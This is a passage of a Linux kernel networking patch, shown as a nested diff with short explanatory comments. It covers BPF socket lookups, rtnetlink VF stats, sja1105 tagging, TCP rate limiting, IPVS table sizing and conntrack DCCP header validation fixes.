+ 	case BPF_FUNC_sk_lookup_tcp:
+-		return &bpf_sk_lookup_tcp_proto;
++		return &bpf_tc_sk_lookup_tcp_proto;
+ 	case BPF_FUNC_sk_lookup_udp:
+-		return &bpf_sk_lookup_udp_proto;
++		return &bpf_tc_sk_lookup_udp_proto;
+ 	case BPF_FUNC_sk_release:
+ 		return &bpf_sk_release_proto;
+ 	case BPF_FUNC_tcp_sock:
+@@ -7912,7 +7990,7 @@ tc_cls_act_func_proto(enum bpf_func_id func_id, const struct bpf_prog *prog)
+ 	case BPF_FUNC_get_listener_sock:
+ 		return &bpf_get_listener_sock_proto;
+ 	case BPF_FUNC_skc_lookup_tcp:
+-		return &bpf_skc_lookup_tcp_proto;
++		return &bpf_tc_skc_lookup_tcp_proto;
+ 	case BPF_FUNC_tcp_check_syncookie:
+ 		return &bpf_tcp_check_syncookie_proto;
+ 	case BPF_FUNC_skb_ecn_set_ce:
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index b192c69f3936c..5625ed30a06f3 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -957,24 +957,27 @@ static inline int rtnl_vfinfo_size(const struct net_device *dev,
+ 			 nla_total_size(sizeof(struct ifla_vf_rate)) +
+ 			 nla_total_size(sizeof(struct ifla_vf_link_state)) +
+ 			 nla_total_size(sizeof(struct ifla_vf_rss_query_en)) +
+-			 nla_total_size(0) + /* nest IFLA_VF_STATS */
+-			 /* IFLA_VF_STATS_RX_PACKETS */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_TX_PACKETS */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_RX_BYTES */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_TX_BYTES */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_BROADCAST */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_MULTICAST */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_RX_DROPPED */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+-			 /* IFLA_VF_STATS_TX_DROPPED */
+-			 nla_total_size_64bit(sizeof(__u64)) +
+ 			 nla_total_size(sizeof(struct ifla_vf_trust)));
++		if (~ext_filter_mask & RTEXT_FILTER_SKIP_STATS) {
++			size += num_vfs *
++				(nla_total_size(0) + /* nest IFLA_VF_STATS */
++				 /* IFLA_VF_STATS_RX_PACKETS */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_TX_PACKETS */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_RX_BYTES */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_TX_BYTES */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_BROADCAST */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_MULTICAST */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_RX_DROPPED */
++				 nla_total_size_64bit(sizeof(__u64)) +
++				 /* IFLA_VF_STATS_TX_DROPPED */
++				 nla_total_size_64bit(sizeof(__u64)));
++		}
+ 		return size;
+ 	} else
+ 		return 0;
+@@ -1253,7 +1256,8 @@ static noinline_for_stack int rtnl_fill_stats(struct sk_buff *skb,
+ static noinline_for_stack int rtnl_fill_vfinfo(struct sk_buff *skb,
+ 					       struct net_device *dev,
+ 					       int vfs_num,
+-					       struct nlattr *vfinfo)
++					       struct nlattr *vfinfo,
++					       u32 ext_filter_mask)
+ {
+ 	struct ifla_vf_rss_query_en vf_rss_query_en;
+ 	struct nlattr *vf, *vfstats, *vfvlanlist;
+@@ -1359,33 +1363,35 @@ static noinline_for_stack int rtnl_fill_vfinfo(struct sk_buff *skb,
+ 		goto nla_put_vf_failure;
+ 	}
+ 	nla_nest_end(skb, vfvlanlist);
+-	memset(&vf_stats, 0, sizeof(vf_stats));
+-	if (dev->netdev_ops->ndo_get_vf_stats)
+-		dev->netdev_ops->ndo_get_vf_stats(dev, vfs_num,
+-						&vf_stats);
+-	vfstats = nla_nest_start_noflag(skb, IFLA_VF_STATS);
+-	if (!vfstats)
+-		goto nla_put_vf_failure;
+-	if (nla_put_u64_64bit(skb, IFLA_VF_STATS_RX_PACKETS,
+-			      vf_stats.rx_packets, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_TX_PACKETS,
+-			      vf_stats.tx_packets, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_RX_BYTES,
+-			      vf_stats.rx_bytes, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_TX_BYTES,
+-			      vf_stats.tx_bytes, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_BROADCAST,
+-			      vf_stats.broadcast, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_MULTICAST,
+-			      vf_stats.multicast, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_RX_DROPPED,
+-			      vf_stats.rx_dropped, IFLA_VF_STATS_PAD) ||
+-	    nla_put_u64_64bit(skb, IFLA_VF_STATS_TX_DROPPED,
+-			      vf_stats.tx_dropped, IFLA_VF_STATS_PAD)) {
+-		nla_nest_cancel(skb, vfstats);
+-		goto nla_put_vf_failure;
++	if (~ext_filter_mask & RTEXT_FILTER_SKIP_STATS) {
++		memset(&vf_stats, 0, sizeof(vf_stats));
++		if (dev->netdev_ops->ndo_get_vf_stats)
++			dev->netdev_ops->ndo_get_vf_stats(dev, vfs_num,
++							  &vf_stats);
++		vfstats = nla_nest_start_noflag(skb, IFLA_VF_STATS);
++		if (!vfstats)
++			goto nla_put_vf_failure;
++		if (nla_put_u64_64bit(skb, IFLA_VF_STATS_RX_PACKETS,
++				      vf_stats.rx_packets, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_TX_PACKETS,
++				      vf_stats.tx_packets, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_RX_BYTES,
++				      vf_stats.rx_bytes, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_TX_BYTES,
++				      vf_stats.tx_bytes, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_BROADCAST,
++				      vf_stats.broadcast, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_MULTICAST,
++				      vf_stats.multicast, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_RX_DROPPED,
++				      vf_stats.rx_dropped, IFLA_VF_STATS_PAD) ||
++		    nla_put_u64_64bit(skb, IFLA_VF_STATS_TX_DROPPED,
++				      vf_stats.tx_dropped, IFLA_VF_STATS_PAD)) {
++			nla_nest_cancel(skb, vfstats);
++			goto nla_put_vf_failure;
++		}
++		nla_nest_end(skb, vfstats);
+ 	}
+-	nla_nest_end(skb, vfstats);
+ 	nla_nest_end(skb, vf);
+ 	return 0;
+ 
+@@ -1418,7 +1424,7 @@ static noinline_for_stack int rtnl_fill_vf(struct sk_buff *skb,
+ 		return -EMSGSIZE;
+ 
+ 	for (i = 0; i < num_vfs; i++) {
+-		if (rtnl_fill_vfinfo(skb, dev, i, vfinfo))
++		if (rtnl_fill_vfinfo(skb, dev, i, vfinfo, ext_filter_mask))
+ 			return -EMSGSIZE;
+ 	}
+ 
+@@ -3986,7 +3992,7 @@ static int nlmsg_populate_fdb_fill(struct sk_buff *skb,
+ 	ndm->ndm_ifindex = dev->ifindex;
+ 	ndm->ndm_state   = ndm_state;
+ 
+-	if (nla_put(skb, NDA_LLADDR, ETH_ALEN, addr))
++	if (nla_put(skb, NDA_LLADDR, dev->addr_len, addr))
+ 		goto nla_put_failure;
+ 	if (vid)
+ 		if (nla_put(skb, NDA_VLAN, sizeof(u16), &vid))
+@@ -4000,10 +4006,10 @@ nla_put_failure:
+ 	return -EMSGSIZE;
+ }
+ 
+-static inline size_t rtnl_fdb_nlmsg_size(void)
++static inline size_t rtnl_fdb_nlmsg_size(const struct net_device *dev)
+ {
+ 	return NLMSG_ALIGN(sizeof(struct ndmsg)) +
+-	       nla_total_size(ETH_ALEN) +	/* NDA_LLADDR */
++	       nla_total_size(dev->addr_len) +	/* NDA_LLADDR */
+ 	       nla_total_size(sizeof(u16)) +	/* NDA_VLAN */
+ 	       0;
+ }
+@@ -4015,7 +4021,7 @@ static void rtnl_fdb_notify(struct net_device *dev, u8 *addr, u16 vid, int type,
+ 	struct sk_buff *skb;
+ 	int err = -ENOBUFS;
+ 
+-	skb = nlmsg_new(rtnl_fdb_nlmsg_size(), GFP_ATOMIC);
++	skb = nlmsg_new(rtnl_fdb_nlmsg_size(dev), GFP_ATOMIC);
+ 	if (!skb)
+ 		goto errout;
+ 
+diff --git a/net/core/sock.c b/net/core/sock.c
+index b021cb9c95ef3..0c1baa5517f11 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -2542,13 +2542,24 @@ kuid_t sock_i_uid(struct sock *sk)
+ }
+ EXPORT_SYMBOL(sock_i_uid);
+ 
+-unsigned long sock_i_ino(struct sock *sk)
++unsigned long __sock_i_ino(struct sock *sk)
+ {
+ 	unsigned long ino;
+ 
+-	read_lock_bh(&sk->sk_callback_lock);
++	read_lock(&sk->sk_callback_lock);
+ 	ino = sk->sk_socket ? SOCK_INODE(sk->sk_socket)->i_ino : 0;
+-	read_unlock_bh(&sk->sk_callback_lock);
++	read_unlock(&sk->sk_callback_lock);
++	return ino;
++}
++EXPORT_SYMBOL(__sock_i_ino);
++
++unsigned long sock_i_ino(struct sock *sk)
++{
++	unsigned long ino;
++
++	local_bh_disable();
++	ino = __sock_i_ino(sk);
++	local_bh_enable();
+ 	return ino;
+ }
+ EXPORT_SYMBOL(sock_i_ino);
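
Splitting out __sock_i_ino() gives callers that already run with bottom halves disabled a variant that takes sk_callback_lock without toggling BHs again, presumably because the _bh variant's unconditional re-enable would be wrong in such a context. A sketch of the intended caller split (the lock name is illustrative):

    /* Already in BH-disabled context: use the plain variant. */
    static unsigned long ino_under_bh(struct sock *sk, spinlock_t *lock)
    {
            unsigned long ino;

            spin_lock_bh(lock);      /* BHs disabled from here on   */
            ino = __sock_i_ino(sk);  /* plain read_lock() inside    */
            spin_unlock_bh(lock);
            return ino;
    }
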
+diff --git a/net/dsa/tag_sja1105.c b/net/dsa/tag_sja1105.c
+index 1a85125bda6da..143348962a216 100644
+--- a/net/dsa/tag_sja1105.c
++++ b/net/dsa/tag_sja1105.c
+@@ -53,11 +53,8 @@
+ #define SJA1110_TX_TRAILER_LEN			4
+ #define SJA1110_MAX_PADDING_LEN			15
+ 
+-#define SJA1105_HWTS_RX_EN			0
+-
+ struct sja1105_tagger_private {
+ 	struct sja1105_tagger_data data; /* Must be first */
+-	unsigned long state;
+ 	/* Protects concurrent access to the meta state machine
+ 	 * from taggers running on multiple ports on SMP systems
+ 	 */
+@@ -113,8 +110,8 @@ static void sja1105_meta_unpack(const struct sk_buff *skb,
+ 	 * a unified unpacking command for both device series.
+ 	 */
+ 	packing(buf,     &meta->tstamp,     31, 0, 4, UNPACK, 0);
+-	packing(buf + 4, &meta->dmac_byte_4, 7, 0, 1, UNPACK, 0);
+-	packing(buf + 5, &meta->dmac_byte_3, 7, 0, 1, UNPACK, 0);
++	packing(buf + 4, &meta->dmac_byte_3, 7, 0, 1, UNPACK, 0);
++	packing(buf + 5, &meta->dmac_byte_4, 7, 0, 1, UNPACK, 0);
+ 	packing(buf + 6, &meta->source_port, 7, 0, 1, UNPACK, 0);
+ 	packing(buf + 7, &meta->switch_id,   7, 0, 1, UNPACK, 0);
+ }
+@@ -387,10 +384,6 @@ static struct sk_buff
+ 
+ 		priv = sja1105_tagger_private(ds);
+ 
+-		if (!test_bit(SJA1105_HWTS_RX_EN, &priv->state))
+-			/* Do normal processing. */
+-			return skb;
+-
+ 		spin_lock(&priv->meta_lock);
+ 		/* Was this a link-local frame instead of the meta
+ 		 * that we were expecting?
+@@ -426,12 +419,6 @@ static struct sk_buff
+ 
+ 		priv = sja1105_tagger_private(ds);
+ 
+-		/* Drop the meta frame if we're not in the right state
+-		 * to process it.
+-		 */
+-		if (!test_bit(SJA1105_HWTS_RX_EN, &priv->state))
+-			return NULL;
+-
+ 		spin_lock(&priv->meta_lock);
+ 
+ 		stampable_skb = priv->stampable_skb;
+@@ -467,30 +454,6 @@ static struct sk_buff
+ 	return skb;
+ }
+ 
+-static bool sja1105_rxtstamp_get_state(struct dsa_switch *ds)
+-{
+-	struct sja1105_tagger_private *priv = sja1105_tagger_private(ds);
+-
+-	return test_bit(SJA1105_HWTS_RX_EN, &priv->state);
+-}
+-
+-static void sja1105_rxtstamp_set_state(struct dsa_switch *ds, bool on)
+-{
+-	struct sja1105_tagger_private *priv = sja1105_tagger_private(ds);
+-
+-	if (on)
+-		set_bit(SJA1105_HWTS_RX_EN, &priv->state);
+-	else
+-		clear_bit(SJA1105_HWTS_RX_EN, &priv->state);
+-
+-	/* Initialize the meta state machine to a known state */
+-	if (!priv->stampable_skb)
+-		return;
+-
+-	kfree_skb(priv->stampable_skb);
+-	priv->stampable_skb = NULL;
+-}
+-
+ static bool sja1105_skb_has_tag_8021q(const struct sk_buff *skb)
+ {
+ 	u16 tpid = ntohs(eth_hdr(skb)->h_proto);
+@@ -540,33 +503,53 @@ static struct sk_buff *sja1105_rcv(struct sk_buff *skb,
+ 	is_link_local = sja1105_is_link_local(skb);
+ 	is_meta = sja1105_is_meta_frame(skb);
+ 
+-	if (sja1105_skb_has_tag_8021q(skb)) {
+-		/* Normal traffic path. */
+-		sja1105_vlan_rcv(skb, &source_port, &switch_id, &vbid, &vid);
+-	} else if (is_link_local) {
++	if (is_link_local) {
+ 		/* Management traffic path. Switch embeds the switch ID and
+ 		 * port ID into bytes of the destination MAC, courtesy of
+ 		 * the incl_srcpt options.
+ 		 */
+ 		source_port = hdr->h_dest[3];
+ 		switch_id = hdr->h_dest[4];
+-		/* Clear the DMAC bytes that were mangled by the switch */
+-		hdr->h_dest[3] = 0;
+-		hdr->h_dest[4] = 0;
+ 	} else if (is_meta) {
+ 		sja1105_meta_unpack(skb, &meta);
+ 		source_port = meta.source_port;
+ 		switch_id = meta.switch_id;
+-	} else {
++	}
++
++	/* Normal data plane traffic and link-local frames are tagged with
++	 * a tag_8021q VLAN which we have to strip
++	 */
++	if (sja1105_skb_has_tag_8021q(skb)) {
++		int tmp_source_port = -1, tmp_switch_id = -1;
++
++		sja1105_vlan_rcv(skb, &tmp_source_port, &tmp_switch_id, &vbid,
++				 &vid);
++		/* Preserve the source information from the INCL_SRCPT option,
++		 * if available. This allows us to not overwrite a valid source
++		 * port and switch ID with zeroes when receiving link-local
++		 * frames from a VLAN-unaware bridged port (non-zero vbid) or a
++		 * VLAN-aware bridged port (non-zero vid). Furthermore, the
++		 * tag_8021q source port information is only of trust when the
++		 * vbid is 0 (precise port). Otherwise, tmp_source_port and
++		 * tmp_switch_id will be zeroes.
++		 */
++		if (vbid == 0 && source_port == -1)
++			source_port = tmp_source_port;
++		if (vbid == 0 && switch_id == -1)
++			switch_id = tmp_switch_id;
++	} else if (source_port == -1 && switch_id == -1) {
++		/* Packets with no source information have no chance of
++		 * getting accepted, drop them straight away.
++		 */
+ 		return NULL;
+ 	}
+ 
+-	if (vbid >= 1)
++	if (source_port != -1 && switch_id != -1)
++		skb->dev = dsa_master_find_slave(netdev, switch_id, source_port);
++	else if (vbid >= 1)
+ 		skb->dev = dsa_tag_8021q_find_port_by_vbid(netdev, vbid);
+-	else if (source_port == -1 || switch_id == -1)
+-		skb->dev = dsa_find_designated_bridge_port_by_vid(netdev, vid);
+ 	else
+-		skb->dev = dsa_master_find_slave(netdev, switch_id, source_port);
++		skb->dev = dsa_find_designated_bridge_port_by_vid(netdev, vid);
+ 	if (!skb->dev) {
+ 		netdev_warn(netdev, "Couldn't decode source port\n");
+ 		return NULL;
+@@ -757,7 +740,6 @@ static void sja1105_disconnect(struct dsa_switch *ds)
+ 
+ static int sja1105_connect(struct dsa_switch *ds)
+ {
+-	struct sja1105_tagger_data *tagger_data;
+ 	struct sja1105_tagger_private *priv;
+ 	struct kthread_worker *xmit_worker;
+ 	int err;
+@@ -777,10 +759,6 @@ static int sja1105_connect(struct dsa_switch *ds)
+ 	}
+ 
+ 	priv->xmit_worker = xmit_worker;
+-	/* Export functions for switch driver use */
+-	tagger_data = &priv->data;
+-	tagger_data->rxtstamp_get_state = sja1105_rxtstamp_get_state;
+-	tagger_data->rxtstamp_set_state = sja1105_rxtstamp_set_state;
+ 	ds->tagger_data = priv;
+ 
+ 	return 0;
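[Note: with SJA1105_HWTS_RX_EN gone, sja1105_rcv() decodes the ingress port from whichever source is most precise: the (switch_id, source_port) pair recovered from meta frames or the INCL_SRCPT DMAC bytes wins, an imprecise bridge id (vbid) comes next, and the designated bridge port for the VLAN id is the last resort. A hedged sketch of that fallback ladder — the find_* helpers are stand-ins, not the DSA API:

	/* Sketch: pick the most precise ingress-port lookup available. */
	static struct net_device *decode_ingress_dev(struct net_device *master,
						     int switch_id, int source_port,
						     int vbid, u16 vid)
	{
		if (source_port != -1 && switch_id != -1)	/* precise */
			return find_slave(master, switch_id, source_port);
		if (vbid >= 1)					/* bridge only */
			return find_port_by_vbid(master, vbid);
		return find_bridge_port_by_vid(master, vid);	/* last resort */
	}
]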
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 5dabb38b857ff..e2d3ea2e34561 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -3590,8 +3590,11 @@ static int tcp_ack_update_window(struct sock *sk, const struct sk_buff *skb, u32
+ static bool __tcp_oow_rate_limited(struct net *net, int mib_idx,
+ 				   u32 *last_oow_ack_time)
+ {
+-	if (*last_oow_ack_time) {
+-		s32 elapsed = (s32)(tcp_jiffies32 - *last_oow_ack_time);
++	/* Paired with the WRITE_ONCE() in this function. */
++	u32 val = READ_ONCE(*last_oow_ack_time);
++
++	if (val) {
++		s32 elapsed = (s32)(tcp_jiffies32 - val);
+ 
+ 		if (0 <= elapsed &&
+ 		    elapsed < READ_ONCE(net->ipv4.sysctl_tcp_invalid_ratelimit)) {
+@@ -3600,7 +3603,10 @@ static bool __tcp_oow_rate_limited(struct net *net, int mib_idx,
+ 		}
+ 	}
+ 
+-	*last_oow_ack_time = tcp_jiffies32;
++	/* Paired with the prior READ_ONCE() and with itself,
++	 * as we might be lockless.
++	 */
++	WRITE_ONCE(*last_oow_ack_time, tcp_jiffies32);
+ 
+ 	return false;	/* not rate-limited: go ahead, send dupack now! */
+ }
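[Note: __tcp_oow_rate_limited() may race with itself on the same counter without a lock, so the shared timestamp is now read once into a local and written back with WRITE_ONCE(); the annotations stop the compiler from tearing, re-reading, or caching the value across the comparison. The bare pattern, sketched outside TCP:

	#include <linux/compiler.h>
	#include <linux/jiffies.h>

	static u32 last_event;	/* shared, accessed locklessly */

	static bool rate_limited(u32 min_delta)
	{
		u32 val = READ_ONCE(last_event);	/* one stable snapshot */

		if (val && (u32)((u32)jiffies - val) < min_delta)
			return true;

		WRITE_ONCE(last_event, (u32)jiffies);	/* single, untorn store */
		return false;
	}
]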
+diff --git a/net/mac80211/debugfs_netdev.c b/net/mac80211/debugfs_netdev.c
+index 5b014786fd2d0..08a1d7564b7f2 100644
+--- a/net/mac80211/debugfs_netdev.c
++++ b/net/mac80211/debugfs_netdev.c
+@@ -694,7 +694,7 @@ static void add_sta_files(struct ieee80211_sub_if_data *sdata)
+ 	DEBUGFS_ADD_MODE(uapsd_queues, 0600);
+ 	DEBUGFS_ADD_MODE(uapsd_max_sp_len, 0600);
+ 	DEBUGFS_ADD_MODE(tdls_wider_bw, 0600);
+-	DEBUGFS_ADD_MODE(valid_links, 0200);
++	DEBUGFS_ADD_MODE(valid_links, 0400);
+ 	DEBUGFS_ADD_MODE(active_links, 0600);
+ }
+ 
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index 30efa26f977f6..b8c6f6a668fc9 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -2861,6 +2861,8 @@ int ieee80211_sta_activate_link(struct sta_info *sta, unsigned int link_id)
+ 	if (!test_sta_flag(sta, WLAN_STA_INSERTED))
+ 		goto hash;
+ 
++	ieee80211_recalc_min_chandef(sdata, link_id);
++
+ 	/* Ensure the values are updated for the driver,
+ 	 * redone by sta_remove_link on failure.
+ 	 */
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 784b9ba61581e..98806c359b173 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -3599,10 +3599,8 @@ bool ieee80211_chandef_he_6ghz_oper(struct ieee80211_sub_if_data *sdata,
+ 	}
+ 
+ 	eht_cap = ieee80211_get_eht_iftype_cap(sband, iftype);
+-	if (!eht_cap) {
+-		sdata_info(sdata, "Missing iftype sband data/EHT cap");
++	if (!eht_cap)
+ 		eht_oper = NULL;
+-	}
+ 
+ 	he_6ghz_oper = ieee80211_he_6ghz_oper(he_oper);
+ 
+diff --git a/net/netfilter/ipvs/Kconfig b/net/netfilter/ipvs/Kconfig
+index 271da8447b293..2a3017b9c001b 100644
+--- a/net/netfilter/ipvs/Kconfig
++++ b/net/netfilter/ipvs/Kconfig
+@@ -44,7 +44,8 @@ config	IP_VS_DEBUG
+ 
+ config	IP_VS_TAB_BITS
+ 	int "IPVS connection table size (the Nth power of 2)"
+-	range 8 20
++	range 8 20 if !64BIT
++	range 8 27 if 64BIT
+ 	default 12
+ 	help
+ 	  The IPVS connection hash table uses the chaining scheme to handle
+@@ -54,24 +55,24 @@ config	IP_VS_TAB_BITS
+ 
+ 	  Note the table size must be power of 2. The table size will be the
+ 	  value of 2 to the your input number power. The number to choose is
+-	  from 8 to 20, the default number is 12, which means the table size
+-	  is 4096. Don't input the number too small, otherwise you will lose
+-	  performance on it. You can adapt the table size yourself, according
+-	  to your virtual server application. It is good to set the table size
+-	  not far less than the number of connections per second multiplying
+-	  average lasting time of connection in the table.  For example, your
+-	  virtual server gets 200 connections per second, the connection lasts
+-	  for 200 seconds in average in the connection table, the table size
+-	  should be not far less than 200x200, it is good to set the table
+-	  size 32768 (2**15).
++	  from 8 to 27 for 64BIT(20 otherwise), the default number is 12,
++	  which means the table size is 4096. Don't input the number too
++	  small, otherwise you will lose performance on it. You can adapt the
++	  table size yourself, according to your virtual server application.
++	  It is good to set the table size not far less than the number of
++	  connections per second multiplying average lasting time of
++	  connection in the table.  For example, your virtual server gets 200
++	  connections per second, the connection lasts for 200 seconds in
++	  average in the connection table, the table size should be not far
++	  less than 200x200, it is good to set the table size 32768 (2**15).
+ 
+ 	  Another note that each connection occupies 128 bytes effectively and
+ 	  each hash entry uses 8 bytes, so you can estimate how much memory is
+ 	  needed for your box.
+ 
+ 	  You can overwrite this number setting conn_tab_bits module parameter
+-	  or by appending ip_vs.conn_tab_bits=? to the kernel command line
+-	  if IP VS was compiled built-in.
++	  or by appending ip_vs.conn_tab_bits=? to the kernel command line if
++	  IP VS was compiled built-in.
+ 
+ comment "IPVS transport protocol load balancing support"
+ 
+diff --git a/net/netfilter/ipvs/ip_vs_conn.c b/net/netfilter/ipvs/ip_vs_conn.c
+index 13534e02346cc..e1b9b52909a5d 100644
+--- a/net/netfilter/ipvs/ip_vs_conn.c
++++ b/net/netfilter/ipvs/ip_vs_conn.c
+@@ -1484,8 +1484,8 @@ int __init ip_vs_conn_init(void)
+ 	int idx;
+ 
+ 	/* Compute size and mask */
+-	if (ip_vs_conn_tab_bits < 8 || ip_vs_conn_tab_bits > 20) {
+-		pr_info("conn_tab_bits not in [8, 20]. Using default value\n");
++	if (ip_vs_conn_tab_bits < 8 || ip_vs_conn_tab_bits > 27) {
++		pr_info("conn_tab_bits not in [8, 27]. Using default value\n");
+ 		ip_vs_conn_tab_bits = CONFIG_IP_VS_TAB_BITS;
+ 	}
+ 	ip_vs_conn_tab_size = 1 << ip_vs_conn_tab_bits;
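[Note: the wider range deserves a quick sizing check against the costs quoted in the Kconfig help text (8 bytes per hash bucket head, ~128 bytes per connection): the new 64-bit maximum of 27 bits buys 2^27 buckets, i.e. a 1 GiB bucket array, where the old cap of 20 bits topped out at 8 MiB. A throwaway userspace estimate:

	#include <stdio.h>

	int main(void)
	{
		unsigned int bits = 27;			 /* conn_tab_bits */
		unsigned long long buckets = 1ULL << bits;
		unsigned long long bucket_bytes = buckets * 8;
		unsigned long long conns = 200ULL * 200; /* rate x avg lifetime */

		printf("%llu buckets, %llu MiB of hash heads\n",
		       buckets, bucket_bytes >> 20);
		printf("example load: %llu conns, ~%llu KiB\n",
		       conns, (conns * 128) >> 10);
		return 0;
	}
]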
+diff --git a/net/netfilter/nf_conntrack_helper.c b/net/netfilter/nf_conntrack_helper.c
+index ff737a76052ed..bf09a1e062481 100644
+--- a/net/netfilter/nf_conntrack_helper.c
++++ b/net/netfilter/nf_conntrack_helper.c
+@@ -358,6 +358,9 @@ int nf_conntrack_helper_register(struct nf_conntrack_helper *me)
+ 	BUG_ON(me->expect_class_max >= NF_CT_MAX_EXPECT_CLASSES);
+ 	BUG_ON(strlen(me->name) > NF_CT_HELPER_NAME_LEN - 1);
+ 
++	if (!nf_ct_helper_hash)
++		return -ENOENT;
++
+ 	if (me->expect_policy->max_expected > NF_CT_EXPECT_MAX_CNT)
+ 		return -EINVAL;
+ 
+@@ -513,4 +516,5 @@ int nf_conntrack_helper_init(void)
+ void nf_conntrack_helper_fini(void)
+ {
+ 	kvfree(nf_ct_helper_hash);
++	nf_ct_helper_hash = NULL;
+ }
+diff --git a/net/netfilter/nf_conntrack_proto_dccp.c b/net/netfilter/nf_conntrack_proto_dccp.c
+index c1557d47ccd1e..d4fd626d2b8c3 100644
+--- a/net/netfilter/nf_conntrack_proto_dccp.c
++++ b/net/netfilter/nf_conntrack_proto_dccp.c
+@@ -432,9 +432,19 @@ static bool dccp_error(const struct dccp_hdr *dh,
+ 		       struct sk_buff *skb, unsigned int dataoff,
+ 		       const struct nf_hook_state *state)
+ {
++	static const unsigned long require_seq48 = 1 << DCCP_PKT_REQUEST |
++						   1 << DCCP_PKT_RESPONSE |
++						   1 << DCCP_PKT_CLOSEREQ |
++						   1 << DCCP_PKT_CLOSE |
++						   1 << DCCP_PKT_RESET |
++						   1 << DCCP_PKT_SYNC |
++						   1 << DCCP_PKT_SYNCACK;
+ 	unsigned int dccp_len = skb->len - dataoff;
+ 	unsigned int cscov;
+ 	const char *msg;
++	u8 type;
++
++	BUILD_BUG_ON(DCCP_PKT_INVALID >= BITS_PER_LONG);
+ 
+ 	if (dh->dccph_doff * 4 < sizeof(struct dccp_hdr) ||
+ 	    dh->dccph_doff * 4 > dccp_len) {
+@@ -459,34 +469,70 @@ static bool dccp_error(const struct dccp_hdr *dh,
+ 		goto out_invalid;
+ 	}
+ 
+-	if (dh->dccph_type >= DCCP_PKT_INVALID) {
++	type = dh->dccph_type;
++	if (type >= DCCP_PKT_INVALID) {
+ 		msg = "nf_ct_dccp: reserved packet type ";
+ 		goto out_invalid;
+ 	}
++
++	if (test_bit(type, &require_seq48) && !dh->dccph_x) {
++		msg = "nf_ct_dccp: type lacks 48bit sequence numbers";
++		goto out_invalid;
++	}
++
+ 	return false;
+ out_invalid:
+ 	nf_l4proto_log_invalid(skb, state, IPPROTO_DCCP, "%s", msg);
+ 	return true;
+ }
+ 
++struct nf_conntrack_dccp_buf {
++	struct dccp_hdr dh;	 /* generic header part */
++	struct dccp_hdr_ext ext; /* optional depending dh->dccph_x */
++	union {			 /* depends on header type */
++		struct dccp_hdr_ack_bits ack;
++		struct dccp_hdr_request req;
++		struct dccp_hdr_response response;
++		struct dccp_hdr_reset rst;
++	} u;
++};
++
++static struct dccp_hdr *
++dccp_header_pointer(const struct sk_buff *skb, int offset, const struct dccp_hdr *dh,
++		    struct nf_conntrack_dccp_buf *buf)
++{
++	unsigned int hdrlen = __dccp_hdr_len(dh);
++
++	if (hdrlen > sizeof(*buf))
++		return NULL;
++
++	return skb_header_pointer(skb, offset, hdrlen, buf);
++}
++
+ int nf_conntrack_dccp_packet(struct nf_conn *ct, struct sk_buff *skb,
+ 			     unsigned int dataoff,
+ 			     enum ip_conntrack_info ctinfo,
+ 			     const struct nf_hook_state *state)
+ {
+ 	enum ip_conntrack_dir dir = CTINFO2DIR(ctinfo);
+-	struct dccp_hdr _dh, *dh;
++	struct nf_conntrack_dccp_buf _dh;
+ 	u_int8_t type, old_state, new_state;
+ 	enum ct_dccp_roles role;
+ 	unsigned int *timeouts;
++	struct dccp_hdr *dh;
+ 
+-	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &_dh);
++	dh = skb_header_pointer(skb, dataoff, sizeof(*dh), &_dh.dh);
+ 	if (!dh)
+ 		return NF_DROP;
+ 
+ 	if (dccp_error(dh, skb, dataoff, state))
+ 		return -NF_ACCEPT;
+ 
++	/* pull again, including possible 48 bit sequences and subtype header */
++	dh = dccp_header_pointer(skb, dataoff, dh, &_dh);
++	if (!dh)
++		return NF_DROP;
++
+ 	type = dh->dccph_type;
+ 	if (!nf_ct_is_confirmed(ct) && !dccp_new(ct, skb, dh, state))
